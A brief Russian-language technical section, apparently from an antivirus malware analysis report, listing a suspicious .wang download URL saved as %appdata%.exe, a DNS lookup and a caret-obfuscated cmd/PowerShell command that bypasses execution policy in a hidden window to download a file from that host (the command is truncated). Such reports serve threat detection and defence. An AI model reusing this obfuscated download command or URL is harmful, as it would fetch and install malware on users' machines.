Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ERSh^El^L^.^ExE^ ^-^Ex^E^cUTIo^n^pOlIC^y BYPA^S^S ^-nO^PrOFil^e^ -^WI^nd^o^WsT^yle HIDD^e^n^ (nEw^-^o^B^je^c^T s^Ys^t^E^M.NEt.^WEb^c^LI^e^N^T).DoW^NLO^A^dFI^Le('http://tolle...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /C "POW^ERSh^El^L^.^ExE^ ^-^Ex^E^cUTIo^n^pOlIC^y BYPA^S^S ^-nO^PrOFil^e^ -^WI^nd^o^WsT^yle HIDD^e^n^ (nEw^-^o^B^je^c^T s^Ys^t^E^M.NEt.^WEb^c^LI^e^N^T).DoW^NLO^A^dFI^Le('http://tolle...' (со скрытым окном)